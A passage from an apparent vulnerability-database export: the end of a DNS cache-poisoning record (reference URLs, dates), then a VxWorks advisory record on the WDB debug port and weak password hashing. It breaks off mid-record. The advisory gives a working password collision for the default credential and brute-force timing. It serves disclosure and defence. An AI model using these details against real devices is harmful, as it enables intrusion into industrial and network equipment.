            "url": "http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-p1-3ubuntu2.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/31430/"
          },
          {
            "trust": 0.1,
            "url": "http://pinguar.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/2536/"
          },
          {
            "trust": 0.1,
            "url": "http://rhn.redhat.com/errata/rhsa-2007-0740.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/network_software_inspector/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/2535/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/13653/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/48/"
          },
          {
            "trust": 0.1,
            "url": "http://rhn.redhat.com"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/13651/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/about_secunia_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/4669/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/4668/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/13652/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/1326/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/26152/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/1306/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/4670/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/2534/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/1044/"
          },
          {
            "trust": 0.1,
            "url": "https://www.xopenid.net"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-3280"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0166"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          },
          {
            "db": "CERT/CC",
            "id": "VU#252735"
          },
          {
            "db": "VULHUB",
            "id": "VHN-31572"
          },
          {
            "db": "PACKETSTORM",
            "id": "68039"
          },
          {
            "db": "PACKETSTORM",
            "id": "68068"
          },
          {
            "db": "PACKETSTORM",
            "id": "73732"
          },
          {
            "db": "PACKETSTORM",
            "id": "68288"
          },
          {
            "db": "PACKETSTORM",
            "id": "68691"
          },
          {
            "db": "PACKETSTORM",
            "id": "68878"
          },
          {
            "db": "PACKETSTORM",
            "id": "68063"
          },
          {
            "db": "PACKETSTORM",
            "id": "69021"
          },
          {
            "db": "PACKETSTORM",
            "id": "68037"
          },
          {
            "db": "PACKETSTORM",
            "id": "68546"
          },
          {
            "db": "PACKETSTORM",
            "id": "58035"
          },
          {
            "db": "PACKETSTORM",
            "id": "68924"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-1447"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#800113",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#252735",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-31572",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "68039",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "68068",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "73732",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "68288",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "68691",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "68878",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "68063",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "69021",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "68037",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "68546",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "58035",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "68924",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2008-1447",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2008-07-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#800113",
            "ident": null
          },
          {
            "date": "2007-07-27T00:00:00",
            "db": "CERT/CC",
            "id": "VU#252735",
            "ident": null
          },
          {
            "date": "2008-07-08T00:00:00",
            "db": "VULHUB",
            "id": "VHN-31572",
            "ident": null
          },
          {
            "date": "2008-07-10T06:26:35",
            "db": "PACKETSTORM",
            "id": "68039",
            "ident": null
          },
          {
            "date": "2008-07-10T07:29:30",
            "db": "PACKETSTORM",
            "id": "68068",
            "ident": null
          },
          {
            "date": "2009-01-12T19:16:04",
            "db": "PACKETSTORM",
            "id": "73732",
            "ident": null
          },
          {
            "date": "2008-07-17T19:16:48",
            "db": "PACKETSTORM",
            "id": "68288",
            "ident": null
          },
          {
            "date": "2008-07-31T22:22:45",
            "db": "PACKETSTORM",
            "id": "68691",
            "ident": null
          },
          {
            "date": "2008-08-06T21:52:19",
            "db": "PACKETSTORM",
            "id": "68878",
            "ident": null
          },
          {
            "date": "2008-07-10T07:10:37",
            "db": "PACKETSTORM",
            "id": "68063",
            "ident": null
          },
          {
            "date": "2008-08-13T04:21:24",
            "db": "PACKETSTORM",
            "id": "69021",
            "ident": null
          },
          {
            "date": "2008-07-10T06:23:57",
            "db": "PACKETSTORM",
            "id": "68037",
            "ident": null
          },
          {
            "date": "2008-07-28T15:27:39",
            "db": "PACKETSTORM",
            "id": "68546",
            "ident": null
          },
          {
            "date": "2007-07-26T04:26:32",
            "db": "PACKETSTORM",
            "id": "58035",
            "ident": null
          },
          {
            "date": "2008-08-08T20:46:25",
            "db": "PACKETSTORM",
            "id": "68924",
            "ident": null
          },
          {
            "date": "2008-07-08T23:41:00",
            "db": "NVD",
            "id": "CVE-2008-1447",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2014-04-14T00:00:00",
            "db": "CERT/CC",
            "id": "VU#800113",
            "ident": null
          },
          {
            "date": "2008-08-06T00:00:00",
            "db": "CERT/CC",
            "id": "VU#252735",
            "ident": null
          },
          {
            "date": "2020-03-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-31572",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2008-1447",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "68068"
          },
          {
            "db": "PACKETSTORM",
            "id": "68063"
          }
        ],
        "trust": 0.2
      },
      "title": {
        "_id": null,
        "data": "Multiple DNS implementations vulnerable to cache poisoning",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "spoof",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "68068"
          },
          {
            "db": "PACKETSTORM",
            "id": "68063"
          },
          {
            "db": "PACKETSTORM",
            "id": "69021"
          },
          {
            "db": "PACKETSTORM",
            "id": "68546"
          }
        ],
        "trust": 0.4
      }
    }

    VAR-201008-0270

    Vulnerability from variot - Updated: 2026-04-10 22:47

    The WDB target agent debug service in Wind River VxWorks 6.x, 5.x, and earlier, as used on the Rockwell Automation 1756-ENBT series A with firmware 3.2.6 and 3.6.1 and other products, allows remote attackers to read or modify arbitrary memory locations, perform function calls, or manage tasks via requests to UDP port 17185, a related issue to CVE-2005-3804. Some products based on VxWorks have the WDB target agent debug service enabled by default. This service provides read/write access to the device's memory and allows functions to be called. The VxWorks WDB target agent is a target-resident, run-time facility that is required for connecting host tools to a VxWorks target system during development. WDB is a selectable component in the VxWorks configuration and is enabled by default. The WDB debug agent access is not secured and does provide a security hole in a deployed system. It is advisable for production systems to reconfigure VxWorks with only those components needed for deployed operation and to build it as the appropriate type of system image. It is recommended to remove host development components such as the WDB target agent and debugging components (INCLUDE_WDB and INCLUDE_DEBUG) as well as other operating system components that are not required to support customer applications. Consult the VxWorks Kernel Programmer's guide for more information on WDB.Additional information can be found in ICS-CERT advisory ICSA-10-214-01 and on the Metasploit Blog. An attacker can use the debug service to fully compromise the device. The hashing algorithm that is used in the standard authentication API for VxWorks is susceptible to collisions. An attacker can brute force a password by guessing a string that produces the same hash as a legitimate password. It is relatively easy to find a string that has the same hash value as a regular password.Authentication by attacker API (loginLib) May be used to access services using. The problem is CVE-2005-3804 May be related toBy a third party UDP An arbitrary memory area may be read or modified, a function call executed, or a task managed through a request to the port. VxWorks is an embedded real-time operating system. VxWorks has multiple security vulnerabilities that allow an attacker to bypass security restrictions and gain unauthorized access to the system. For example, when logging in with the default 'target/password', 'y{{{{{SS' will HASH out the same result as 'password'. So you can use 'password' and 'y{{{{{SS' as the password to log in. Permissions and access control vulnerabilities exist in the WDB Target Agent Debugging Service in Wind River VxWorks 6.x, 5.x and earlier. VxWorks is prone to a remote security-bypass vulnerability. Successful exploits will allow remote attackers to perform debugging tasks on the vulnerable device. The issue affects multiple products from multiple vendors that ship with the VxWorks operating system. NOTE: This issue was previously covered in BID 42114 (VxWorks Multiple Security Vulnerabilities) but has been separated into its own record to better document it. R7-0035: VxWorks Authentication Library Weak Password Hashing August 2, 2010

    -- Vulnerability Details: This vulnerability allows remote attackers to bypass the authentication process for the Telnet and FTP services of the VxWorks operating system. This flaw occurs due to an insecure password hashing implementation in the authentication library (loginLib) of the VxWorks operating system. Regardless of what password is set for a particular account, there are a only small number (~210k) of possible hash outputs. Typical passwords consisting of alphanumeric characters and symbols fall within an even smaller range of hash outputs (~8k), making this trivial to brute force over the network. To excaberate matters, loginLib has no support for account lockouts and the FTP daemon does not disconnect clients that consistently fail to authenticate. This reduces the brute force time for the FTP service to approximately 30 minutes.

    To demonstrate the hash weakness, the password of "insecure" hashes to the value "Ry99dzRcy9". The hashing algorithm itself is based on an additive sum with a small XOR operation. The resulting sums are then transformed to a printable string, but the range of possible intermediate values is limited and mostly sequential. The entire collision table has been precomputed and will be released in early September as an input file for common brute force tools. More information about the hashing algorithm itself is available at the Metasploit blog post below:

    http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html

    There are three requirements for this vulnerability to be exploited:

    • The device must be running at least one service that uses loginLib for authentication. Telnet and FTP do so by default.

    • A valid username must be known to the attacker. This is usually easy to determine through product manuals or a cursory review of the firmware binaries.

    A typical VxWorks device will meet all three requirements by default, but customization by the device manufacturer may preclude this from being exploited. In general, if the device displays a VxWorks banner for Telnet or FTP, it is more than likely vulnerable.

    -- Vendor Response: Wind River Systems has notified their customers of the issue and suggested that each downstream vendor replace the existing hash implementation with SHA512 or SHA256. The exact extent of the vulnerability and the complete list of affected devices is not known at this time. Example code from Wind River Systems has been supplied to CERT and is included in the advisory below:

    http://www.kb.cert.org/vuls/id/840249

    -- Disclosure Timeline: 2009-06-02 - Vulnerability reported to CERT for vendor notification 2009-08-02 - Coordinated public release of advisory

    -- Credit: This vulnerability was discovered by HD Moore

    -- About Rapid7 Security Rapid7 provides vulnerability management, compliance and penetration testing solutions for Web application, network and database security. In addition to developing the NeXpose Vulnerability Management system, Rapid7 manages the Metasploit Project and is the primary sponsor of the W3AF web assessment tool.

    Our vulnerability disclosure policy is available online at:

    http://www.rapid7.com/disclosure.jsp

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "river systems vxworks through",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "wind",
            "version": "6.56.9"
          },
          {
            "_id": null,
            "model": "1756-enbt\\/a",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "rockwellautomation",
            "version": "3.2.6"
          },
          {
            "_id": null,
            "model": "1756-enbt\\/a",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "rockwellautomation",
            "version": "3.6.1"
          },
          {
            "_id": null,
            "model": "vxworks",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "windriver",
            "version": "6.9.4.12"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ericsson",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "polycom",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "wind river",
            "version": null
          },
          {
            "_id": null,
            "model": "vxworks",
            "scope": null,
            "trust": 0.8,
            "vendor": "wind river",
            "version": null
          },
          {
            "_id": null,
            "model": "1756-enbt series a",
            "scope": null,
            "trust": 0.8,
            "vendor": "rockwell automation",
            "version": null
          },
          {
            "_id": null,
            "model": "1756-enbt series a",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "rockwell automation",
            "version": "3.2.6 and  3.6.1"
          },
          {
            "_id": null,
            "model": "vxworks",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "wind river",
            "version": "6.x"
          },
          {
            "_id": null,
            "model": "vxworks",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "wind river",
            "version": "5.x"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.6,
            "vendor": "no",
            "version": null
          },
          {
            "_id": null,
            "model": "1756-enbt series a",
            "scope": null,
            "trust": 0.6,
            "vendor": "rockwellautomation",
            "version": null
          },
          {
            "_id": null,
            "model": "phaser 3635mfp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "0"
          },
          {
            "_id": null,
            "model": "river systems vxworks",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wind",
            "version": "0"
          },
          {
            "_id": null,
            "model": "oronoco ap600",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "proxim",
            "version": "2.5.5(1070)"
          },
          {
            "_id": null,
            "model": "oronoco ap600",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "proxim",
            "version": "2.5.3(914)"
          },
          {
            "_id": null,
            "model": "oronoco ap600",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "proxim",
            "version": "2.5.2(894)"
          },
          {
            "_id": null,
            "model": "oronoco ap600",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "proxim",
            "version": "2.4.5(758)"
          },
          {
            "_id": null,
            "model": "oronoco ap600",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "proxim",
            "version": "2.4.11(821)"
          },
          {
            "_id": null,
            "model": "oronoco ap600",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "proxim",
            "version": "2.2.0(460)"
          },
          {
            "_id": null,
            "model": "oronoco ap600",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "proxim",
            "version": "2.1.1(403)"
          },
          {
            "_id": null,
            "model": "oronoco ap600",
            "scope": null,
            "trust": 0.3,
            "vendor": "proxim",
            "version": null
          },
          {
            "_id": null,
            "model": "grandslam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "paradyne",
            "version": "4200"
          },
          {
            "_id": null,
            "model": "networks wlan access point",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2220"
          },
          {
            "_id": null,
            "model": "networks passport",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1100/1150/1200/1250"
          },
          {
            "_id": null,
            "model": "networks optical trouble ticketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "cmts038-007 cmts2.6.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "kathrein",
            "version": null
          },
          {
            "_id": null,
            "model": "cmts038-007 cmts2.17.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "kathrein",
            "version": null
          },
          {
            "_id": null,
            "model": "cmts038-007 cmts2.14.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "kathrein",
            "version": null
          },
          {
            "_id": null,
            "model": "cmts038-007 cmts2.11.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "kathrein",
            "version": null
          },
          {
            "_id": null,
            "model": "gaoke co mg6000 voip gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks edgeiron 4802f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "foundry",
            "version": "1.4.8"
          },
          {
            "_id": null,
            "model": "networks edgeiron 4802f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "foundry",
            "version": "1.3.7"
          },
          {
            "_id": null,
            "model": "networks edgeiron 4802f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "foundry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "_id": null,
            "model": "ip phone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7920"
          },
          {
            "_id": null,
            "model": "cadant c3 cmts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arris",
            "version": "0"
          },
          {
            "_id": null,
            "model": "omniswitch 5.1.5.245.r04",
            "scope": null,
            "trust": 0.3,
            "vendor": "alcatel lucent",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "7d738f00-463f-11e9-ac13-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "017253fa-2356-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CERT/CC",
            "id": "VU#840249"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-1489"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-3891"
          },
          {
            "db": "BID",
            "id": "42158"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201008-029"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001882"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-005612"
          },
          {
            "db": "NVD",
            "id": "CVE-2010-2965"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:windriver:vxworks",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001882"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Thanks to HD Moore for reporting a wider scope with additional research related to this vulnerability.  Earlier public reports came from Bennett Todd and Shawn Merdinger. This document was written by Jared Allar. ",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#362332"
          }
        ],
        "trust": 0.8
      },
      "cve": "CVE-2010-2965",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2010-2965",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "availabilityRequirement": "NOT DEFINED",
                "baseScore": 10.0,
                "collateralDamagePotential": "NOT DEFINED",
                "confidentialityImpact": "COMPLETE",
                "confidentialityRequirement": "NOT DEFINED",
                "enviromentalScore": 9.5,
                "exploitability": "HIGH",
                "exploitabilityScore": 10.0,
                "id": "CVE-2010-2965",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "integrityRequirement": "NOT DEFINED",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "remediationLevel": "WORKAROUND",
                "reportConfidence": "CONFIRMED",
                "severity": "HIGH",
                "targetDistribution": "HIGH",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vector_string": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CARNEGIE MELLON",
                "availabilityImpact": "COMPLETE",
                "availabilityRequirement": "NOT DEFINED",
                "baseScore": 10.0,
                "collateralDamagePotential": "NOT DEFINED",
                "confidentialityImpact": "COMPLETE",
                "confidentialityRequirement": "NOT DEFINED",
                "enviromentalScore": 9.5,
                "exploitability": "HIGH",
                "exploitabilityScore": 10.0,
                "id": "VU#840249",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "integrityRequirement": "NOT DEFINED",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "remediationLevel": "WORKAROUND",
                "reportConfidence": "CONFIRMED",
                "severity": "HIGH",
                "targetDistribution": "NOT DEFINED",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vector_string": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2010-3891",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "bab59964-1fb2-11e6-abef-000c29c66e3d",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "7d72f2c0-463f-11e9-98f5-000c29342cb1",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "7d738f00-463f-11e9-ac13-000c29342cb1",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "017253fa-2356-11e6-abef-000c29c66e3d",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-45570",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2010-2965",
                "trust": 1.6,
                "value": "HIGH"
              },
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2010-2965",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#840249",
                "trust": 0.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2010-3891",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201008-029",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "IVD",
                "id": "bab59964-1fb2-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "7d72f2c0-463f-11e9-98f5-000c29342cb1",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "7d738f00-463f-11e9-ac13-000c29342cb1",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "017253fa-2356-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-45570",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "bab59964-1fb2-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "7d72f2c0-463f-11e9-98f5-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "7d738f00-463f-11e9-ac13-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "017253fa-2356-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CERT/CC",
            "id": "VU#362332"
          },
          {
            "db": "CERT/CC",
            "id": "VU#840249"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-3891"
          },
          {
            "db": "VULHUB",
            "id": "VHN-45570"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201008-029"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-005612"
          },
          {
            "db": "NVD",
            "id": "CVE-2010-2965"
          }
        ]
      },
      "description": {
        "_id": null,
